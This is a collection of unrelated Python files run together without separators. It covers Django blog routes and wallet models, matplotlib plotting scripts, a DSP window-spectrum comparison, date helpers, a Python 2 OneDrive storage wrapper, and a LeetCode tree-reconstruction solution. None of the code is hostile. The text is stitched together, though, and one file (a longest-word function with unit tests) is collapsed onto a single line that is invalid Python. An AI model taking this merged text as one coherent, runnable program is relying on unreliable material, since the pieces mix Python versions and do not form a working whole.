# URL routes for the blog app: posts, comments, file uploads/photos, and tags.
from django.urls import path
from . import views

urlpatterns = [
    path('blog/', views.ListPost.as_view()),
    path('blog/<int:pk>/', views.DetailPost.as_view()),
    # File upload endpoint (the only named route in this module).
    path('upload/', views.FileView.as_view(), name='file-upload'),
    path('comment/', views.CommentView.as_view()),
    path('blog_comment/', views.ListComment.as_view()),
    path('photos/', views.ListFile.as_view()),
    path('photos/<int:pk>/', views.DetailFile.as_view()),
    path('tags/', views.ListTags.as_view()),
]
#!/usr/bin/env python
# Plot Saquon Barkley's 2018 fantasy points for games 1-11 as blue diamonds.
import matplotlib.pyplot as plt

# Statistics for Saquon Barkley's 2018 Fantasy Scoring
game_numbers = list(range(1, 12))
fantasy_points = [20.8, 24.8, 22.7, 22, 28.9, 37.9, 26.4, 20.1, 0, 14, 35.2]

fig = plt.figure()
fig.suptitle('2018 Fantasy Points per Game for Saquon Barkley', fontsize=18)
plt.xlabel('Game', fontsize=14)
plt.ylabel('Points', fontsize=14)
plt.plot(game_numbers, fantasy_points, 'bD')  # 'bD' = blue diamond markers
plt.axis([0, 12, 0, 40])  # x: games 0-12, y: points 0-40
plt.show()
# DB: Good!
# Wallet domain models: a user's wallets hold generic assets, and transactions
# record conversions between two generic objects (via contenttypes).
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.db import models
from users.models import User
import uuid


class Transaction(models.Model):
    # A conversion from one generic object ("from") to another ("to") for a
    # user.  Both sides are GenericForeignKeys keyed by ContentType + UUID.
    # NOTE(review): from_amount is a FloatField; for monetary amounts a
    # DecimalField is usually preferred -- confirm precision requirements.
    # NOTE(review): there is no to_amount field -- confirm that is intended.
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='transactions')
    from_type = models.ForeignKey(ContentType, on_delete=models.CASCADE, related_name='from_transactions')
    from_id = models.UUIDField()
    from_object = GenericForeignKey('from_type', 'from_id')
    from_amount = models.FloatField(blank=False, null=False)
    to_type = models.ForeignKey(ContentType, on_delete=models.CASCADE, related_name='to_transactions')
    to_id = models.UUIDField()
    to_object = GenericForeignKey('to_type', 'to_id')
    created_at = models.DateTimeField(auto_now_add=True, editable=False, null=False, blank=False)
    updated_at = models.DateTimeField(auto_now=True, editable=False, null=False, blank=False)


class Wallet(models.Model):
    # A named container of assets belonging to one user.
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    name = models.CharField(max_length=100, default='Default wallet')
    user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='wallets')


class Asset(models.Model):
    # A quantity of some generic asset object (currency, token, ...) in a wallet.
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    wallet = models.ForeignKey(Wallet, on_delete=models.CASCADE, related_name='assets')
    asset_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
    asset_id = models.UUIDField()
    asset_object = GenericForeignKey('asset_type', 'asset_id')
    asset_amount = models.FloatField(blank=False, null=False)
"""Find the longest word in a given string.""" import unittest def longest_word(sen: str) -> str: """ Find the longest word in a space separated string. :param sen: A space separated string of words. This can also include punctuation, but punctuation will be ignored. :return: The longest string in sen(punctuation will be ignored). If two strings are the same length, the first will be returned. """ longest_word = 0 longest_index = None split_words = sen.split() for index, word in enumerate(split_words): alphas = [] for char in word: if char.isalpha() or char.isnumeric(): alphas.append(char) if len(alphas) > longest_word: longest_word, longest_index = len(alphas), index return split_words[longest_index] class LongestWordTest(unittest.TestCase): """Testing for longest word function.""" def test_it_knows_the_longest_word(self): """Return the longest word excluding punctuation.""" self.assertEqual(longest_word('I love dogs'), 'love') self.assertEqual(longest_word('I love #dogs!!!!'), 'love') self.assertEqual(longest_word('123456789 98765432'), '123456789') if __name__ == '__main__': unittest.main()
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 21 19:15:01 2019

@author: nico

Compares stock NumPy/SciPy window functions against hand-written ones from
pdsmodulos: plots each window, the magnitude of its DFT, and a zero-padded
DFT (finer frequency resolution), all in dB.
"""
import sys
sys.path.append('/home/nico/Documentos/facultad/6to_nivel/pds/git/pdstestbench')
import os
import matplotlib.pyplot as plt
import numpy as np
import scipy.signal as sg
from pdsmodulos.signals import FFT
from pdsmodulos.signals import windows as wds
#import seaborn as sns

os.system ("clear")  # clear the python terminal
plt.close("all")  # close all open figures

N = 1000  # samples
fs = 1000  # Hz
df = fs / N  # spectral resolution
a0 = 2  # Volts
p0 = 0  # radians
f0 = fs / 4
M = 9*N  # number of padding zeros appended to each window

# Pairs of (library window, hand-written equivalent) to compare.
ventanas = [np.bartlett(N), wds.triang(N), np.hanning(N), wds.hann(N), np.blackman(N), wds.blackamanHarris(N), sg.flattop(N), wds.flattop(N), sg.boxcar(N), sg.boxcar(N)]
V = len(ventanas)
ventana = ["Bartell", "my_Triang", "Hanning", "my_Hanning", "Blackman", "my_Blackman", "Flattop", "my_Flattop", "Rectangular", "my_Rectangular"]
aux_padding = np.zeros(M, float)

# build the window matrix (one column per window) and the magnitude of its DFT
signal = np.vstack(np.transpose([this_w for this_w in ventanas]))
mod_signal = np.vstack(np.transpose([np.abs(np.fft.fft(signal[:,ii]))*2/N for ii in range(V)]))

# same, but with M zeros appended to each window (zero padding)
signal_padding = np.vstack(np.transpose([np.concatenate((this_w,aux_padding), axis=0) for this_w in ventanas]))
mod_signal_padding = np.vstack(np.transpose([np.abs(np.fft.fft(signal_padding[:,ii]))*2/(N + M) for ii in range(V)]))

# convert to dB, normalized per column by the DC (f=0) bin value
mod_signal = 20 *np.log10(mod_signal/mod_signal[0])
mod_signal_padding = 20 *np.log10(mod_signal_padding/mod_signal_padding[0])

# generate the time and (normalized) frequency axes
tt = np.linspace(0, (N-1)/fs, N)
freq = np.linspace(0, (N-1)*df, N) / fs
freq2 = np.linspace(0, (N + M-1)*df, N + M) / (10*fs)

# One figure per library/hand-written pair: top row = library window
# (time, FFT, zero-padded FFT), bottom row = the hand-written version.
for ii in (0,2,4,6,8):
    # figure for this window pair
    fig = plt.figure("ventana " + ventana[ii], constrained_layout=True)
    gs = fig.add_gridspec(2, 3)
    # time-domain plot of the library window
    f_ax1 = fig.add_subplot(gs[0, 0])
    f_ax1.set_title(ventana[ii])
    f_ax1.plot(tt,ventanas[ii])
    f_ax1.set_xlabel("tiempo [S]")
    f_ax1.set_ylabel("Amplitud")
    f_ax1.axhline(0, color="black")
    f_ax1.axvline(0, color="black")
    f_ax1.grid()
    # DFT magnitude of the library window (positive half-spectrum)
    f_ax2 = fig.add_subplot(gs[0, 1])
    f_ax2.set_title("FFT " + ventana[ii])
    f_ax2.plot(freq[0:int(N/2)], mod_signal[0:int(N/2),ii], marker='.', linestyle='None')
    f_ax2.set_xlabel('frecuecnia normalizada f/fs [Hz]')
    f_ax2.set_ylabel("Magnitud [dB]")
    f_ax2.axhline(0, color="black")
    f_ax2.axvline(0, color="black")
    f_ax2.grid()
    # zero-padded DFT magnitude of the library window (zoom near DC)
    f_ax3 = fig.add_subplot(gs[0, 2])
    f_ax3.set_title("Zero padding " + ventana[ii])
    f_ax3.plot(freq2[0:int((N+M)/2)], mod_signal_padding[0:int((N + M)/2),ii], marker='.', linestyle='None')
    f_ax3.set_xlabel('frecuecnia normalizada f/fs [Hz]')
    f_ax3.set_ylabel("Magnitud [dB]")
    f_ax3.axhline(0, color="black")
    f_ax3.axvline(0, color="black")
    f_ax3.set_xlim(0, 0.015)
    f_ax3.set_ylim(-150, 0)
    f_ax3.grid()
    # time-domain plot of the hand-written window
    f_ax4 = fig.add_subplot(gs[1, 0])
    f_ax4.set_title(ventana[ii + 1])
    f_ax4.plot(tt,ventanas[ii + 1])
    f_ax4.set_xlabel("tiempo [S]")
    f_ax4.set_ylabel("Amplitud")
    f_ax4.axhline(0, color="black")
    f_ax4.axvline(0, color="black")
    f_ax4.grid()
    # DFT magnitude of the hand-written window
    f_ax5 = fig.add_subplot(gs[1, 1])
    f_ax5.set_title("FFT " + ventana[ii + 1])
    f_ax5.plot(freq[0:int(N/2)], mod_signal[0:int(N/2),ii + 1], marker='.', linestyle='None')
    f_ax5.set_xlabel('frecuecnia normalizada f/fs [Hz]')
    f_ax5.set_ylabel("Magnitud [dB]")
    f_ax5.axhline(0, color="black")
    f_ax5.axvline(0, color="black")
    f_ax5.grid()
    # zero-padded DFT magnitude of the hand-written window (zoom near DC)
    f_ax6 = fig.add_subplot(gs[1, 2])
    f_ax6.set_title("Zero padding " + ventana[ii + 1])
    f_ax6.plot(freq2[0:int((N+M)/2)], mod_signal_padding[0:int((N + M)/2),ii + 1], marker='.', linestyle='None')
    f_ax6.set_xlabel('frecuecnia normalizada f/fs [Hz]')
    f_ax6.set_ylabel("Magnitud [dB]")
    f_ax6.axhline(0, color="black")
    f_ax6.axvline(0, color="black")
    f_ax6.set_xlim(0, 0.015)
    f_ax6.set_ylim(-150, 0)
    f_ax6.grid()

# Overlay of all zero-padded library-window spectra for main-lobe/side-lobe
# comparison.
fig2 = plt.figure("Comparación de los módulos de las ventanas")
plt.plot(freq2[0:int((N + M)/2)], mod_signal_padding[0:int((N + M)/2),0], marker='.', linestyle='None', label=ventana[0])
plt.plot(freq2[0:int((N + M)/2)], mod_signal_padding[0:int((N + M)/2),2], marker='.', linestyle='None', label=ventana[2])
plt.plot(freq2[0:int((N + M)/2)], mod_signal_padding[0:int((N + M)/2),4], marker='.', linestyle='None', label=ventana[4])
plt.plot(freq2[0:int((N + M)/2)], mod_signal_padding[0:int((N + M)/2),6], marker='.', linestyle='None', label=ventana[6])
plt.plot(freq2[0:int((N + M)/2)], mod_signal_padding[0:int((N + M)/2),8], marker='.', linestyle='None', label=ventana[8])
plt.xlabel('frecuecnia normalizada f/fs [Hz]')
plt.ylabel("Magnitud [dB]")
plt.axhline(0, color="black")
plt.axvline(0, color="black")
plt.xlim(0, 0.01)
plt.ylim(-150, 0)
plt.grid()
plt.legend(loc ='upper right')
from datetime import datetime, timedelta


def getStartOfAttemptCycleDate():
    """Return the start of the current attempt cycle as a date."""
    return getStartOfAttemptCycle().date()


def getStartOfAttemptCycle():
    """Return midnight of today shifted back 5 hours.

    NOTE(review): the fixed -5h offset ("UTC minus 5 is central") ignores
    daylight saving time -- confirm whether a tz-aware datetime is wanted.
    """
    pub_date = datetime.today()
    min_pub_date_time = datetime.combine(pub_date, datetime.min.time())
    min_pub_date_time -= timedelta(hours=5)  # UTC minus 5 is central
    return min_pub_date_time


def getEndOfAttemptCycleDate():
    """Return the end of the current attempt cycle as a date."""
    # BUG FIX: the original read `getEndOfAttemptCycle.date()` -- it called
    # .date() on the function object (AttributeError) instead of its result.
    return getEndOfAttemptCycle().date()


def getEndOfAttemptCycle():
    """Return the last microsecond of today shifted back 5 hours."""
    pub_date = datetime.today()
    max_pub_date_time = datetime.combine(pub_date, datetime.max.time())
    max_pub_date_time -= timedelta(hours=5)  # UTC minus 5 is central
    return max_pub_date_time

# from goals.time import getStartOfAttemptCycle
# from goals.time import getEndOfAttemptCycle
#! /usr/bin/env python
# coding=utf8
# OneDrive storage backend for pyproxy: wraps the onedrive api_v5 client
# behind the put/get/delete/clean/quota interface used by the rest of the
# project, persisting OAuth tokens in the project database.
# NOTE(review): Python 2 code (print statements, raw_input, httplib,
# ConfigParser, `except ..., e` syntax).
import logging
import os
import sys
import uuid
import pyproxy.safestore.handler.defines as defines
import pyproxy.safestore.db.db_provider as dbprovider
from onedrive import api_v5
from onedrive.api_v5 import DoesNotExists, ProtocolError
from httplib import BadStatusLine, ResponseNotReady
from ssl import SSLError
import requests
import ConfigParser

# OAuth client settings come from the shared ACCOUNTS.INI next to this
# package's configuration directory.
config = ConfigParser.ConfigParser()
HERE = os.path.abspath(os.path.dirname(__file__))
config.read(os.path.join(HERE, '../configuration/ACCOUNTS.INI'))
CLIENT_ID = config.get('ONEDRIVE','CLIENT_ID')
CLIENT_SECRET = config.get('ONEDRIVE','CLIENT_SECRET')
REDIRECT_URI = config.get('ONEDRIVE', 'REDIRECT_URI')
AUTHORIZE_URI = config.get('ONEDRIVE','AUTHORIZE_URI')
TOKEN_URI = config.get('ONEDRIVE','TOKEN_URI')
CODE_URI = config.get('ONEDRIVE','CODE_URI')


class ODrive():
    """Thin wrapper around api_v5.OneDriveAPI.

    Tokens are stored/loaded via the project DB; transient transport errors
    (ProtocolError, SSLError, BadStatusLine, ResponseNotReady) are retried
    by recursing into the same method.
    """

    def __init__(self):
        self.logger = logging.getLogger('onedrive')
        self.db = dbprovider.DB()
        # NOTE(review): api_client is set to None here and never assigned
        # again in this file -- possibly dead state.
        self.api_client = None
        self.api = self.setup_api()
        self.logger.info("Access token: "+ str(self.access_token))

    def setup_api(self):
        """ Initiates the onedrive API client.

        If no access token is stored in the DB, runs an interactive console
        OAuth flow (prints an authorization URL, reads the redirect URL back
        from stdin) and persists the resulting tokens.  Otherwise reuses the
        stored access/refresh tokens.

        Returns:
           A configured api client
        """
        api = api_v5.OneDriveAPI()
        api.client_id = CLIENT_ID
        api.client_secret = CLIENT_SECRET
        api.auth_url_user = AUTHORIZE_URI
        api.auth_redirect_uri = REDIRECT_URI
        # extend the default scopes with wl.emails so getUserEmail can work
        api.auth_scope = (api.auth_scope[0], api.auth_scope[1], api.auth_scope[2], 'wl.emails')
        self.access_token = self.db.get_provider_token('onedrive')
        self.refresh_token = self.db.get_provider_refresh_token('onedrive')
        if self.access_token is None:
            # first run: interactive OAuth authorization via the console
            authorize_url = api.auth_user_get_url()
            sys.stdout.write("1. Go to: " + authorize_url + "\n")
            sys.stdout.write("2. Click \"Allow\" (you might have to log in first).\n")
            sys.stdout.write("3. Copy the redirect url.\n")
            url = raw_input("Enter the authorization url here: ").strip()
            print api.auth_user_process_url(url)
            print api.auth_get_token()
            self.db.set_provider_token('onedrive', api.auth_access_token, api.auth_refresh_token)
        else:
            api.auth_access_token = self.access_token
            api.auth_refresh_token = self.refresh_token
        return api

    def createDir(self,path):
        # Create the directory named by the second-to-last path segment.
        # For shallow paths the parent is the drive root ('me/skydrive');
        # deeper paths resolve the parent folder first.
        paths=path.split("/")
        parent_id='me/skydrive'
        if len(paths)>3:
            cut=path[0:-1].rfind('/')
            parent_id=self.api.resolve_path(path[:cut+1])
        self.api.mkdir(paths[-2],folder_id=parent_id)

    def listChildren(self,path):
        # Return the names of the entries directly under `path`;
        # an empty list if the folder does not exist.
        try:
            url=self.api.resolve_path(path)
            return [x['name'] for x in self.api.listdir(folder_id=url)]
        except DoesNotExists:
            self.logger.exception("listChildren error")
            return []

    def put(self, data, path):
        # Upload `data` to `path` by spooling it through a local temp file.
        self.logger.debug("Put path:"+path)
        tmpfile_path=defines.TEMP_PATH + 'tmpfile-one' + str(uuid.uuid4())
        cut=path.rfind('/')
        path=path[cut+1:]  # keep only the file name
        api = self.setup_api()
        try:
            myfile = defines.temp_file_open(tmpfile_path)
            myfile.seek(0)
            myfile.write(data)
            myfile.seek(0)
            # NOTE(review): `path` was just reassigned to the base name, so
            # path[:cut+1] slices the base name rather than the original
            # directory part -- confirm this resolves the intended parent.
            parent_id=api.resolve_path(path[:cut+1])
            api.put((path,myfile),folder_id=parent_id)
        except (ProtocolError,SSLError,BadStatusLine,ResponseNotReady) as e:
            #Try again
            print e
            self.put(data,path)
        finally:
            # NOTE(review): if temp_file_open itself raised, `myfile` is
            # unbound here and this finally would raise NameError.
            defines.temp_file_close(myfile)
            defines.temp_file_delete(tmpfile_path)

    def get(self, path):
        # Download and return the contents stored at `path`;
        # None if it does not exist.  Transport errors retry recursively.
        self.logger.debug("Get path:" + path)
        try:
            api = self.setup_api()
            url = api.resolve_path(path)
            contents = api.get(url)
            return contents
        except DoesNotExists:
            return None
        except (ProtocolError, SSLError, BadStatusLine, ResponseNotReady):
            #Try again
            return self.get(path)

    def clean(self,path):
        # Delete every entry under `path`, then `path` itself
        # (the root '/' is emptied but never deleted).
        self.logger.debug("Clean path:"+path)
        try:
            url=self.api.resolve_path(path)
            files=self.api.listdir(folder_id=url)
            for mfile in files:
                link=mfile['id']
                self.api.delete(link)
            if path!='/':
                self.api.delete(url)
        except DoesNotExists:
            return None
        except (ProtocolError,SSLError,BadStatusLine,ResponseNotReady),e:
            #Try again
            print "Error"+str(e)
            self.clean(path)

    def clear(self):
        # Wipe the whole drive by cleaning from the root.
        self.clean("/")

    def delete(self,path):
        # Delete the single entry at `path`; no-op if it does not exist.
        self.logger.debug("Delete path:"+path)
        try:
            url=self.api.resolve_path(path)
            self.api.delete(url)
        except DoesNotExists:
            return None
        except (ProtocolError,SSLError,BadStatusLine,ResponseNotReady):
            #Try again
            self.delete(path)

    def quota(self):
        """Returns the current free space in bytes in the Drive """
        try:
            return self.api.get_quota()[0]
        except (ProtocolError,SSLError,BadStatusLine,ResponseNotReady):
            #Try again
            return self.quota()

    def getUserEmail(self):
        # NOTE(review): indexes the live API response with
        # ['emails']['account'] -- verify the /me payload shape.
        return requests.get("https://apis.live.net/v5.0/me?access_token="+self.api.auth_access_token).json()['emails']['account']

    def getUserName(self):
        # Display name of the account owner, fetched from the live /me endpoint.
        return requests.get("https://apis.live.net/v5.0/me?access_token="+self.api.auth_access_token).json()['name']
import matplotlib.pyplot as plt
import sys
import os

# The shared utility scripts live wherever UTIL_SCRIPTS_DIR points; refuse
# to continue without it so the imports below can resolve.
scriptsDir = os.environ.get("UTIL_SCRIPTS_DIR")
if scriptsDir is None:
    raise Exception("Please set environment variable UTIL_SCRIPTS_DIR")
sys.path.insert(0, scriptsDir)
import pathSetter
import util
import fileProcessing as fp
import argparse
import matplotlib.pyplot as plt
import numpy as np
from collections import defaultdict


class StackedBarChartOptions(object):
    """Display options for stackedBarChart: legend names and bar colors, one per series."""
    def __init__(self, stackedSeriesNames, colors):
        self.stackedSeriesNames = stackedSeriesNames
        self.colors = colors


def stackedBarChart(stackedMeans, stackedBarChartOptions, width=0.35, figSize=(10,10)):
    """Draw a stacked bar chart and show it; returns the pyplot module.

    stackedMeans is two-dimensional: axis 0 indexes the series, axis 1 the
    bars.  Positive and negative contributions are accumulated separately so
    each series stacks away from zero in its own direction.
    """
    numBars = stackedMeans.shape[1]
    barPositions = np.arange(numBars)
    posBase = np.zeros(numBars)  # running top of the positive stack, per bar
    negBase = np.zeros(numBars)  # running bottom of the negative stack, per bar
    legendHandles = []
    plt.figure(figsize=figSize)
    for seriesMeans, seriesColor in zip(stackedMeans, stackedBarChartOptions.colors):
        isPositive = seriesMeans > 0
        isNegative = seriesMeans < 0
        handle = plt.bar(barPositions, seriesMeans, width, color=seriesColor,
                         bottom=posBase*isPositive + negBase*isNegative)
        legendHandles.append(handle)
        posBase += seriesMeans*isPositive
        negBase += seriesMeans*isNegative
    plt.legend([handle[0] for handle in legendHandles],
               stackedBarChartOptions.stackedSeriesNames)
    plt.show()
    return plt

#an attempt to make matplotlib somewhat as easy as R.
def plotHeatmap(data, logTransform=False, zeroCenter=False, cmap=plt.cm.coolwarm, figsize=(15,15)):
    """Render `data` as a heatmap in a new figure and show it.

    logTransform and zeroCenter are forwarded to plotHeatmapGivenAx.
    Returns the pyplot module for chaining.
    """
    fig, ax = plt.subplots(figsize=figsize)
    plotHeatmapGivenAx(ax, data, logTransform=logTransform,
                       zeroCenter=zeroCenter, cmap=cmap)
    plt.show()
    return plt


def plotHeatmapGivenAx(ax, data, logTransform=False, zeroCenter=False, cmap=plt.cm.coolwarm):
    """Draw `data` on an existing matplotlib axis and return the axis.

    logTransform applies a signed log compression: log(|x|+1)*sign(x).
    zeroCenter rescales negatives by |min| and positives by max so both
    sides occupy [-1, 1].  The `min == 0` guard avoids one division by
    zero; NOTE(review): data whose max is 0 would still divide by zero --
    confirm zeroCenter inputs always contain positive values.
    """
    if logTransform:
        data = np.log(np.abs(data) + 1)*np.sign(data)
    if zeroCenter:
        data = data*((data < 0)/(1 if np.min(data) == 0 else np.abs(np.min(data)))
                     + (data > 0)/np.max(data))
    ax.pcolor(data, cmap=cmap)
    return ax


def plotHeatmapSortedByLabels(arr, labels, *args, **kwargs):
    """Group the rows of `arr` by label, print per-label counts in
    descending label order, then heatmap the sorted array.

    Extra args/kwargs are forwarded to plotHeatmap.
    """
    arrSortedByLabels = util.sortByLabels(arr, labels)
    countsPerLabel = defaultdict(int)  # idiomatic counter (was defaultdict(lambda: 0))
    for label in labels:
        countsPerLabel[label] += 1
    for label in sorted(countsPerLabel.keys(), key=lambda x: -x):
        print(label, ":", countsPerLabel[label])
    plotHeatmap(np.array(arrSortedByLabels), *args, **kwargs)


def barplot(data, figsize=None, dashedLine=None, title=""):
    """Bar plot of `data` with an optional horizontal dashed reference line.

    Returns the pyplot module for chaining.
    """
    plt.figure(figsize=figsize)
    plt.title(title)
    plt.bar(np.arange(len(data)), data)
    if dashedLine is not None:
        plt.axhline(dashedLine, linestyle='dashed', color='black')
    plt.show()
    return plt


def plotHist(data, bins=None, figsize=(7,7), title="", **kwargs):
    """Histogram of `data`; defaults to one bin per data point.

    Extra kwargs are forwarded to plt.hist.
    """
    # fixed: was `bins==None`; identity comparison is correct for None
    if bins is None:
        bins = len(data)
    plt.figure(figsize=figsize)
    plt.hist(data, bins=bins, **kwargs)
    plt.title(title)
    plt.show()


def scatterPlot(xycoords, labels=None, colors=None, figsize=(5,5), xlabel="", ylabel=""):
    """
    If labels is not none, will assign colors using points evenly sampled
    from Blue -> Violet -> Red -> Yellow -> Green
    """
    # (dropped the redundant function-local `import matplotlib.pyplot as plt`;
    # the module-level import is already relied on by every other function here)
    plt.figure(figsize=figsize)
    if labels is None:
        plt.scatter(xycoords[:,0], xycoords[:,1])
    else:
        if colors is None:
            maxLabel = np.max(labels)
            colors = [util.fracToRainbowColour(x/float(maxLabel)) if x > 0
                      else util.fracToRainbowColour(0) for x in range(maxLabel+1)]
            print("No colors supplied, so autogen'd as:\n"
                  + "\n".join(str(x) for x in list(enumerate(colors))))
        plt.scatter(xycoords[:,0], xycoords[:,1], c=[colors[x] for x in labels])
    plt.xlabel(xlabel)
    plt.ylabel(ylabel)
    plt.show()


def plotImage(image, dpiMultiplier=2.5):
    """Show a 2-D (grayscale) or HxWx3 (RGB) array at roughly native pixel size."""
    assert len(image.shape) == 2 or len(image.shape) == 3
    if len(image.shape) == 3:
        assert image.shape[2] == 3
    dpi = int(20*dpiMultiplier)
    margin = 0.05  # (5% of the width/height of the figure...)
    xpixels, ypixels = image.shape[0], image.shape[1]
    # Make a figure big enough to accomodate an axis of xpixels by ypixels
    # as well as the ticklabels, etc...
    figsize = (1 + margin) * ypixels / dpi, (1 + margin) * xpixels / dpi
    fig = plt.figure(figsize=figsize, dpi=dpi)
    # Make the axis the right size...
    ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])
    ax.imshow(image, interpolation='none')
    plt.show()


def plotOneHotEncodingsAsImage(oneHotEncodings, *args, **kwargs):
    """Render a batch of 4-row one-hot encodings as an RGB image.

    Each column becomes one pixel whose color is chosen by the argmax row
    and scaled by the column's peak value (saturating at 0.7); all-zero
    columns render black.  Extra args/kwargs are forwarded to plotImage.
    """
    assert len(oneHotEncodings.shape) == 3
    assert oneHotEncodings.shape[1] == 4
    # one RGB triple per one-hot row
    colors = [(0,1,0), (0,0,1), (1,1,0), (1,0,0)]
    # fixed: `xrange` does not exist in Python 3 (the rest of this file uses
    # py3 print()); also removed the unused `rowMaxes` computation and the
    # unused enumerate index.
    image = np.array([[np.array(colors[np.argmax(oneHotEncoding[:,i])])
                       * min(1, np.max(oneHotEncoding[:,i])/0.7)
                       if np.max(oneHotEncoding[:,i]) > 0 else (0,0,0)
                       for i in range(oneHotEncoding.shape[1])]
                      for oneHotEncoding in oneHotEncodings])
    plotImage(image, *args, **kwargs)
# Definition for a binary tree node.
# class TreeNode(object):
#     def __init__(self, val=0, left=None, right=None):
#         self.val = val
#         self.left = left
#         self.right = right
class Solution(object):
    def buildTree(self, inorder, postorder):
        """
        Reconstruct a binary tree from its inorder and postorder traversals.

        :type inorder: List[int]
        :type postorder: List[int]
        :rtype: TreeNode
        """
        # Map each value to its inorder position once: O(1) lookups replace
        # the O(n) inorder.index() call per node, turning the original
        # O(n^2) construction into O(n).  Assumes distinct values, as the
        # original list.index approach effectively did.
        inorder_index = {val: i for i, val in enumerate(inorder)}

        def construct(iS, iE, pS, pE):
            # Empty postorder range -> no subtree here.
            if pS > pE:
                return None
            root_val = postorder[pE]          # last postorder entry is the root
            index = inorder_index[root_val]   # split point inside inorder
            node = TreeNode(root_val)
            left_size = index - iS            # number of nodes in the left subtree
            node.left = construct(iS, index - 1, pS, pS + left_size - 1)
            node.right = construct(index + 1, iE, pS + left_size, pE - 1)
            return node

        return construct(0, len(inorder) - 1, 0, len(postorder) - 1)